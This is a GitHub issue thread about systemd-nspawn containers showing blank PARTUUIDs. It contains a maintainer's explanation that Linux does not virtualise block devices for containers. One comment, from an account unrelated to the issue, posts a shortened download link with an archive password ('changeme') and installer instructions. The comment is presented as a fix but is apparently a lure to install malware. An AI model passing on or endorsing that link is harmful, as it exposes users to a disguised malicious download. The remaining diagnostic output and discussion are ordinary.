### ISSUE TITLE
PARTUUIDs are blank in nspawn container

### ISSUE THREAD

**Issue by greyltc** [systemd/systemd#34150] opened 2024-08-27 16:47 UTC
### systemd version the issue has been seen with

256.5

### Used distribution

Arch Linux

### Linux kernel version used

6.10.6-arch1-1

### CPU architectures issue was seen on

x86_64

### Component

systemd-nspawn

### Expected behaviour you didn't see

I expect
```
# lsblk -o+PARTUUID
```
when run inside a container started like `sudo systemd-nspawn --boot --image /dev/nvme0n1` to print partition UUIDs

### Unexpected behaviour you saw

boot with `sudo systemd-nspawn --boot --image /dev/nvme0n1`, then inside:
```
# lsblk -o+PARTUUID
NAME        MAJ:MIN RM   SIZE RO TYPE MOUNTPOINTS                                       PARTUUID
sda           8:0    1  28.9G  0 disk                                                   
├─sda1        8:1    1   550M  0 part                                                   
└─sda2        8:2    1  28.3G  0 part /var/log/journal/0f9014fe9e1242919c0f4073370697f2 
                                      /run/host/os-release                              
nvme0n1     259:0    0 476.9G  0 disk                                                   
├─nvme0n1p1 259:6    0   612M  0 part /boot                                             
├─nvme0n1p2 259:7    0    16M  0 part                                                   
├─nvme0n1p3 259:8    0   256G  0 part                                                   
├─nvme0n1p4 259:9    0   768M  0 part                                                   
└─nvme0n1p5 259:10   0 219.6G  0 part /
```
all PARTUUIDs are blank

### Steps to reproduce the problem

1) boot with `sudo systemd-nspawn --boot --image /dev/nvme0n1`
2) Then once inside run `lsblk -o+PARTUUID` as root

**Comment by greyltc** [comment] 2024-08-27 16:56
I think this issue might be why `systemd-remount-fs.service` is failing inside my container (because PARTUUIDs are unknowable in there):
```
# systemctl status systemd-remount-fs.service
× systemd-remount-fs.service - Remount Root and Kernel File Systems
     Loaded: loaded (/usr/lib/systemd/system/systemd-remount-fs.service; enabled-runtime; preset: disabled)
     Active: failed (Result: exit-code) since Tue 2024-08-27 10:38:12 MDT; 8min ago
 Invocation: 16a5c93ec51a457598e3e40461525684
       Docs: man:systemd-remount-fs.service(8)
             https://systemd.io/API_FILE_SYSTEMS
    Process: 23 ExecStart=/usr/lib/systemd/systemd-remount-fs (code=exited, status=1/FAILURE)
   Main PID: 23 (code=exited, status=1/FAILURE)
   Mem peak: 1.7M
        CPU: 17ms

Aug 27 10:38:12 box systemd-remount-fs[31]: mount: /: can't find PARTUUID=24e150a1-bd44-4a39-a58a-1e1ae28d3eb6.
Aug 27 10:38:12 box systemd-remount-fs[23]: /usr/bin/mount for / exited with exit status 1.
Aug 27 10:38:12 box systemd[1]: systemd-remount-fs.service: Main process exited, code=exited, status=1/FAILURE
Aug 27 10:38:12 box systemd[1]: systemd-remount-fs.service: Failed with result 'exit-code'.
Aug 27 10:38:12 box systemd[1]: Failed to start Remount Root and Kernel File Systems.
```
I've generated my /etc/fstab with Arch's `genfstab -t PARTUUID`:
```
# cat /etc/fstab 
# Static information about the filesystems.
# See fstab(5) for details.

# <file system> <dir> <type> <options> <dump> <pass>
# /dev/nvme0n1p5 UUID=58bd588e-d307-4b27-94bc-6aad1a0fbc62 LABEL=ROOTBTRFS
PARTUUID=24e150a1-bd44-4a39-a58a-1e1ae28d3eb6   /               btrfs           rw,noatime,compress=zstd:2,ssd,discard=async,space_cache=v2,subvolid=256,subvol=/root   0 0

# /dev/nvme0n1p5 UUID=58bd588e-d307-4b27-94bc-6aad1a0fbc62 LABEL=ROOTBTRFS
PARTUUID=24e150a1-bd44-4a39-a58a-1e1ae28d3eb6   /home           btrfs           rw,noatime,compress=zstd:2,ssd,discard=async,space_cache=v2,subvolid=257,subvol=/home   0 0

# /dev/nvme0n1p1 UUID=A5CD-30D4
PARTUUID=0510831a-ea1c-443a-a9ae-8df8f5ff1d3b   /boot           vfat            rw,relatime,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro   0 2
```
`lsblk -o+PARTUUID` of course prints the correct PARTUUIDs when run outside of the `systemd-nspawn` boot.

**Comment by c0ffincolors** [comment] 2024-08-27 16:58
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by greyltc** [comment] 2024-08-27 17:18
After some help from folks on the systemd irc channel, it seems like the cause of this might be that `systemd-udevd` is not running in the container because /sys is not writable:
```
# systemctl status systemd-udevd
○ systemd-udevd.service - Rule-based Manager for Device Events and Files
     Loaded: loaded (/usr/lib/systemd/system/systemd-udevd.service; static)
     Active: inactive (dead)
TriggeredBy: ○ systemd-udevd-kernel.socket
             ○ systemd-udevd-control.socket
  Condition: start condition unmet at Tue 2024-08-27 10:59:36 MDT; 6min ago
             └─ ConditionPathIsReadWrite=/sys was not met
       Docs: man:systemd-udevd.service(8)
             man:udev(7)

Aug 27 10:59:36 box systemd[1]: Rule-based Manager for Device Events and Files was skipped because of an unmet condition check (ConditionPathIsReadWrite=/sys).
```

**Comment by greyltc** [comment] 2024-08-27 18:02
relatedly, `blkid` when run as root in the container prints nothing

**Comment by poettering** [comment] 2024-08-29 08:11
the linux device model is not virtualized for containers. That's a limitation of linux. Hence block devices are generally not passed through. udev does not run in containers because of that.

Or in other words: what you are trying to do is simply not support, not as a shortcoming of systemd, udev or nspawn, but simply as a shortcoming of Linux.

Should Linux provide device namespacing/virtualization one day, in a way usable for containers then we can support that, but righ tnow it doesn't, hence you only get a half-assed view of /sys/ and nothing much in /dev/ and no udev database.

Closing, since this is not a bug in our codebase, and not actionable for us.

**Closed as completed by poettering** 2024-08-29 08:11 UTC
Labels: bug 🐛, nspawn, not-our-bug

**Comment by greyltc** [comment] 2024-08-29 12:20
Thank you for the explanation
